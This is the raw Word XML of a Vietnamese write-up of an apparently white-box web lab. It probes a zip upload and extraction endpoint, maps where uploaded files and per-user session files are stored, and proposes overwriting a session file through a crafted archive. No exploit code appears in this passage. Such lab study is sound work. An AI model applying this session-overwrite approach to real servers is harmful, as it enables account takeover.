                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4126DF81" w14:textId="77777777" w:rsidR="0091015C" w:rsidRDefault="0091015C"/>
    <w:p w14:paraId="7A35FCA4" w14:textId="77777777" w:rsidR="0091015C" w:rsidRDefault="0091015C"/>
    <w:p w14:paraId="2C33D83D" w14:textId="77777777" w:rsidR="0091015C" w:rsidRDefault="0091015C"/>
    <w:p w14:paraId="59076E61" w14:textId="77777777" w:rsidR="0091015C" w:rsidRDefault="0091015C"/>
    <w:p w14:paraId="4757BB3B" w14:textId="09EE924F" w:rsidR="00E0104A" w:rsidRDefault="0061625B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Kiểm tra lại :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6927DFC8" w14:textId="0D94DDA5" w:rsidR="0061625B" w:rsidRDefault="0061625B">
      <w:r w:rsidRPr="0061625B">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2307AF00" wp14:editId="52F419CF">
            <wp:extent cx="5731510" cy="1828165"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="2103992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2338" name="Picture 1" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1828165"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F99A2D8" w14:textId="44EEEA5E" w:rsidR="007F14DB" w:rsidRDefault="007F14DB" w:rsidP="009C5F5E">
      <w:r w:rsidRPr="007F14DB">
        <w:t xml:space="preserve">File hello.zip đã sẵn sàng để upload lên hệ thống tại endpoint /user/upload. Đây là bước khởi đầu để kiểm tra cách server xử lý file </w:t>
      </w:r>
      <w:r w:rsidR="009C5F5E">
        <w:t>nén.</w:t>
      </w:r>
      <w:r w:rsidR="00A43657">
        <w:t xml:space="preserve"> Thực hiện gửi file hello.zip lên trang web và thực hiện </w:t>
      </w:r>
      <w:r w:rsidR="002E6AC8">
        <w:t>upload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CA431F" w14:textId="3F004200" w:rsidR="009C5F5E" w:rsidRDefault="005308C3" w:rsidP="005308C3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="005308C3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07F0C695" wp14:editId="600A6509">
            <wp:extent cx="5534797" cy="4239217"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="12884195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19561" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5534797" cy="4239217"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC4D47C" w14:textId="2E9E547C" w:rsidR="002E6AC8" w:rsidRPr="00254B5C" w:rsidRDefault="002E6AC8" w:rsidP="002E6AC8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Thông báo upload và giải nén thành công xuất </w:t>
      </w:r>
      <w:r w:rsidR="00254B5C">
        <w:t xml:space="preserve">hiện, </w:t>
      </w:r>
      <w:r w:rsidR="00254B5C" w:rsidRPr="00254B5C">
        <w:t xml:space="preserve">không có thông báo lỗi hoặc xác thực bổ </w:t>
      </w:r>
      <w:r w:rsidR="00254B5C">
        <w:t>sung.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A57D9E9" w14:textId="5F238B25" w:rsidR="005308C3" w:rsidRDefault="005308C3" w:rsidP="009C5F5E">
      <w:r w:rsidRPr="005308C3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="719DFB9E" wp14:editId="6F13C4D7">
            <wp:extent cx="5731510" cy="1071880"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="17792190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9010" name="Picture 1" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1071880"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48985347" w14:textId="1D0B7D63" w:rsidR="00254B5C" w:rsidRDefault="00254B5C" w:rsidP="009C5F5E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Thực hiện gửi lại file 1 lần nữa và có thông báo rằng </w:t>
      </w:r>
      <w:r w:rsidR="00125F98">
        <w:t xml:space="preserve">khi đọc file ở trong zip để thực hiện giải nén và upload ra thì file đã tồn tại ở files/abcdef/hello. Điều này </w:t>
      </w:r>
      <w:r w:rsidR="00A52F39">
        <w:t xml:space="preserve">cho biết rằng file đã được lưu vào thư </w:t>
      </w:r>
      <w:r w:rsidR="00B403AE" w:rsidRPr="00B403AE">
        <w:t>mục nội bộ</w:t>
      </w:r>
      <w:r w:rsidR="00A52F39">
        <w:t xml:space="preserve"> files/abcdef/hello.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713E6EEB" w14:textId="033213F4" w:rsidR="00C36809" w:rsidRDefault="00C36809" w:rsidP="009C5F5E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33341E61" wp14:editId="019DF69C">
            <wp:extent cx="5731510" cy="921385"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1169482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82357" name="Picture 1" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="921385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F773478" w14:textId="77777777" w:rsidR="00B403AE" w:rsidRPr="00B403AE" w:rsidRDefault="00B403AE" w:rsidP="00B403AE">
      <w:r w:rsidRPr="00B403AE">
        <w:t>Để kiểm tra xem hệ thống có cho phép truy cập trực tiếp tới file đã upload hay không, mình thử truy cập vào một loạt đường dẫn tiềm năng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B24C053" w14:textId="77777777" w:rsidR="00B403AE" w:rsidRPr="00B403AE" w:rsidRDefault="00B403AE" w:rsidP="00B403AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B403AE">
        <w:t>/user/upload/files/abcdef/hello</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF31D1A" w14:textId="77777777" w:rsidR="00B403AE" w:rsidRPr="00B403AE" w:rsidRDefault="00B403AE" w:rsidP="00B403AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B403AE">
        <w:t>/user/files/abcdef/hello</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B025F8" w14:textId="77777777" w:rsidR="00B403AE" w:rsidRPr="00B403AE" w:rsidRDefault="00B403AE" w:rsidP="00B403AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B403AE">
        <w:t>/files/abcdef/hello</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AD656D" w14:textId="77777777" w:rsidR="00B403AE" w:rsidRPr="00B403AE" w:rsidRDefault="00B403AE" w:rsidP="00B403AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B403AE">
        <w:t>/files/abcdef</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F18C143" w14:textId="77777777" w:rsidR="00B403AE" w:rsidRPr="00B403AE" w:rsidRDefault="00B403AE" w:rsidP="00B403AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B403AE">
        <w:t>/files/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BB3028" w14:textId="77777777" w:rsidR="00B403AE" w:rsidRPr="00B403AE" w:rsidRDefault="00B403AE" w:rsidP="00B403AE">
      <w:r w:rsidRPr="00B403AE">
        <w:t>Tuy nhiên, tất cả các đường dẫn trên đều trả về lỗi hoặc bị từ chối truy cập. Không có file nào được hiển thị hoặc phục vụ qua giao diện web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5691D4" w14:textId="77777777" w:rsidR="00B403AE" w:rsidRPr="00B403AE" w:rsidRDefault="00B403AE" w:rsidP="00B403AE">
      <w:r w:rsidRPr="00B403AE">
        <w:t>Điều này chứng minh rằng hệ thống không cho phép truy cập trực tiếp tới các file đã upload thông qua HTTP. File được lưu trữ nội bộ, nhưng không được expose ra ngoài — ít nhất là không qua các endpoint thông thường.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE9AB61" w14:textId="7EE65086" w:rsidR="00EF48D7" w:rsidRPr="00EF48D7" w:rsidRDefault="00EF48D7" w:rsidP="00EF48D7">
      <w:r w:rsidRPr="00EF48D7">
        <w:t xml:space="preserve">Sau khi kiểm thử với file .zip, mình tiếp tục upload một file bình </w:t>
      </w:r>
      <w:r>
        <w:t>thường,</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF48D7">
        <w:t xml:space="preserve"> cụ thể là file hello chứa nội dung "test" để quan sát phản ứng của hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54037F78" w14:textId="0CD9768A" w:rsidR="00E0104A" w:rsidRDefault="007310C1" w:rsidP="009C5F5E">
      <w:r w:rsidRPr="007310C1">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DA54F1F" wp14:editId="0A2D6514">
            <wp:extent cx="5667375" cy="3474720"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="1055951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1060" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId14"/>
                    <a:srcRect t="6321" b="3604"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5668166" cy="3475205"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="703A972E" w14:textId="3A6C8D3F" w:rsidR="0053486C" w:rsidRDefault="0053486C" w:rsidP="009C5F5E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Kết quả cho thấy rằng </w:t>
      </w:r>
      <w:r w:rsidR="00661B4F">
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidR="004411DF" w:rsidRPr="004411DF">
        <w:t>ệ thống từ chối file không có định dạng nén hợp lệ.</w:t>
      </w:r>
      <w:r w:rsidR="00661B4F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004411DF" w:rsidRPr="004411DF">
        <w:t xml:space="preserve">File sau khi upload sẽ được lưu vào thư mục uploads/ với một </w:t>
      </w:r>
      <w:r w:rsidR="004411DF" w:rsidRPr="004411DF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tên UUID tự sinh</w:t>
      </w:r>
      <w:r w:rsidR="004411DF" w:rsidRPr="004411DF">
        <w:t xml:space="preserve"> (ví dụ: 4ec68b19-2b0d-4636-86a0-dd78991b40c0).</w:t>
      </w:r>
      <w:r w:rsidR="00661B4F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004411DF" w:rsidRPr="004411DF">
        <w:t>Điều này cho thấy hệ thống có bước lưu file tạm trước khi xử lý nội dung.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2717BC12" w14:textId="068E272D" w:rsidR="00A43657" w:rsidRDefault="001023B5" w:rsidP="009C5F5E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16819928" wp14:editId="322FC4D7">
            <wp:extent cx="5731510" cy="784860"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="52835295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52954" name="Picture 1" descr="A black screen with white text&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="784860"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="763E1780" w14:textId="0A593FD1" w:rsidR="00661B4F" w:rsidRDefault="00661B4F" w:rsidP="00527195">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00215CF9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Kiểm tra ban đầu ở bên ngoài là như vậy, h mình sẽ truy cập vào shell của </w:t>
      </w:r>
      <w:r w:rsidR="00406B65" w:rsidRPr="00215CF9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">server để có cái nhìn tổng quan nhất (vì đây là lab </w:t>
      </w:r>
      <w:r w:rsidR="00215CF9" w:rsidRPr="00215CF9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>white box)</w:t>
      </w:r>
      <w:r w:rsidR="00215CF9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F75760" w14:textId="3535EF6B" w:rsidR="00215CF9" w:rsidRPr="00215CF9" w:rsidRDefault="003029E4" w:rsidP="009C5F5E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003029E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="712EAFDD" wp14:editId="1C421AF9">
            <wp:extent cx="5731510" cy="757555"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="4778232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3286" name="Picture 1" descr="A black background with white text&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="757555"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4C11F2" w14:textId="25FA6B06" w:rsidR="00215CF9" w:rsidRPr="007F14DB" w:rsidRDefault="007E2996" w:rsidP="009C5F5E">
      <w:r>
        <w:t>Thực hiện tìm kiếm file hello đã upload lên lúc trước:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324BF5B0" w14:textId="77777777" w:rsidR="00A02B76" w:rsidRDefault="007E2996" w:rsidP="00527195">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D45AA23" wp14:editId="0BA2A808">
            <wp:extent cx="5731510" cy="1405890"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="180630621" name="Picture 3"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621" name="Picture 3" descr="A computer screen shot of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r w:rsidR="00527195" w:rsidRPr="00527195">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0217E280" w14:textId="3EE83785" w:rsidR="00527195" w:rsidRDefault="00527195" w:rsidP="00527195">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00527195">
        <w:t xml:space="preserve">File hello được ghi đúng nội dung, chứng tỏ quá trình giải nén và ghi file hoạt động bình </w:t>
      </w:r>
      <w:r w:rsidR="00A02B76">
        <w:t>thường.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335FD2C5" w14:textId="264B6AAD" w:rsidR="00A02B76" w:rsidRDefault="00A02B76" w:rsidP="00527195">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kiểm tra thư mục </w:t>
      </w:r>
      <w:r w:rsidR="00C103E6">
        <w:t>uploads</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA3AA6D" w14:textId="4951029F" w:rsidR="00C103E6" w:rsidRDefault="00C103E6" w:rsidP="00527195">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C103E6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43DE7889" wp14:editId="109B9CD9">
            <wp:extent cx="5731510" cy="1562100"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1185409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0951" name="Picture 1" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1562100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F20D0CA" w14:textId="54E29E62" w:rsidR="003217A1" w:rsidRDefault="003217A1" w:rsidP="00FB0B30">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="003217A1">
        <w:t xml:space="preserve">Thư mục chứa nhiều file với tên dạng </w:t>
      </w:r>
      <w:r>
        <w:t>UUID, file tương ứng file hello vẫn trả về giá trị test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AF127A" w14:textId="1967D346" w:rsidR="00FB0B30" w:rsidRDefault="00FB0B30" w:rsidP="00FB0B30">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Kết quả cho thấy h</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB0B30">
        <w:t>ệ thống lưu file upload vào thư mục uploads/ với tên UUID để tránh xung đột tên.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB0B30">
        <w:t>Sau đó, file sẽ được kiểm tra định dạng, giải nén (nếu hợp lệ), và ghi nội dung vào thư mục /files/.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> V</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB0B30">
        <w:t>iệc này giúp xác nhận quy trình xử lý file upload từ đầu đến cuối, đồng thời mở ra hướng khai thác tiềm năng nếu có thể kiểm soát nội dung archive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C91876" w14:textId="77777777" w:rsidR="00ED4D9C" w:rsidRDefault="00ED4D9C" w:rsidP="00FB0B30">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F92A8BB" w14:textId="77777777" w:rsidR="00FC7CFE" w:rsidRDefault="00FC7CFE" w:rsidP="00FB0B30">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2895ADC0" w14:textId="71445F71" w:rsidR="00ED4D9C" w:rsidRDefault="00ED4D9C" w:rsidP="00FB0B30">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Kiểm tra vị trí lưu cookie </w:t>
      </w:r>
      <w:r w:rsidR="00CB52C6">
        <w:t>ở</w:t>
      </w:r>
      <w:r w:rsidR="00CB52C6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CB52C6" w:rsidRPr="007710FD">
        <w:t>/tmp/sessions/{username}</w:t>
      </w:r>
      <w:r>
        <w:t>như đã được biết từ source code</w:t>
      </w:r>
      <w:r w:rsidR="00CB52C6">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B078411" w14:textId="63CE6EE1" w:rsidR="003E1239" w:rsidRDefault="003E1239" w:rsidP="00FB0B30">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="003E1239">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01808E7A" wp14:editId="537D82EE">
            <wp:extent cx="5731510" cy="1093470"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1078335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511" name="Picture 1" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1093470"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1998B02F" w14:textId="5B02CFE9" w:rsidR="00EC7577" w:rsidRDefault="00EC7577" w:rsidP="00FB0B30">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Kết hợp cùng request trước đó để xem cookie hiện tại của người dùng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48ABFCBA" w14:textId="15D9AD0B" w:rsidR="00EC7577" w:rsidRDefault="00EC7577" w:rsidP="00FB0B30">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00EC7577">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AD04876" wp14:editId="710127B5">
            <wp:extent cx="5731510" cy="2030730"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="1480420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0310" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2030730"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C39182" w14:textId="4EC5CBB2" w:rsidR="00383A59" w:rsidRDefault="00CB52C6" w:rsidP="00383A59">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kết quả cho thấy </w:t>
      </w:r>
      <w:r w:rsidR="0063458E">
        <w:t>cookie được lưu trong file có tên trùng với session id</w:t>
      </w:r>
      <w:r w:rsidR="00383A59">
        <w:t xml:space="preserve"> đã sử dụng để đăng nhập. </w:t>
      </w:r>
      <w:r w:rsidR="00383A59" w:rsidRPr="00383A59">
        <w:t>Điều này cho thấy ứng dụng sử dụng cookie-based session để xác thực người dùng.</w:t>
      </w:r>
      <w:r w:rsidR="00A31005">
        <w:t xml:space="preserve"> Đây là 1 vị trí tiềm năng có thể khai thác </w:t>
      </w:r>
      <w:r w:rsidR="00A31005" w:rsidRPr="00A31005">
        <w:t>bằng cách ghi đè session. Đây là một ví dụ điển hình của insecure deserialization hoặc insecure file handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C406735" w14:textId="498E38B3" w:rsidR="009574E2" w:rsidRDefault="009574E2" w:rsidP="00383A59">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tiếp đó mình sẽ </w:t>
      </w:r>
      <w:r w:rsidR="00A31005">
        <w:t xml:space="preserve">tiếp tục </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nghiên cứu </w:t>
      </w:r>
      <w:r w:rsidR="00A31005">
        <w:t>thêm source code để có thể tìm hướng khai thác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DD75A9" w14:textId="186C6B45" w:rsidR="003217A1" w:rsidRPr="00FB0B30" w:rsidRDefault="00DD0931" w:rsidP="00FB0B30">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Trước tiên có 1 hàm khá thú vị liên quan đến </w:t>
      </w:r>
      <w:r w:rsidR="00C305AB">
        <w:t>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287"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C305AB" w:rsidRPr="00C305AB" w14:paraId="1E0CD964" w14:textId="77777777" w:rsidTr="00C305AB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
